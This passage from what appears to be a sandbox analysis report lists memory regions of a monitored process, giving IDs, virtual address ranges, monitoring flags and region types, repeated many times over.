= "pagefile_0x0000000000610000" filename = "" Region: id = 15614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15623 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15624 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15628 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15629 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15630 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15631 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15632 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15633 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15634 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15635 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15636 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15637 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15638 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15639 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15640 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15661 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15662 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15663 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15664 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15665 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15685 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15686 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15687 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15688 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15689 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15690 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15691 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15692 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15693 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15694 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15695 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15696 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15697 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15698 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15699 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15700 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15701 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15702 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15703 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15704 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15705 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15706 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15707 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15708 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15725 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15727 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15728 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15729 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15732 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15733 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15734 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15740 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15741 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15762 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15763 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15764 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15765 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15789 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15790 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15791 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15792 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15793 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 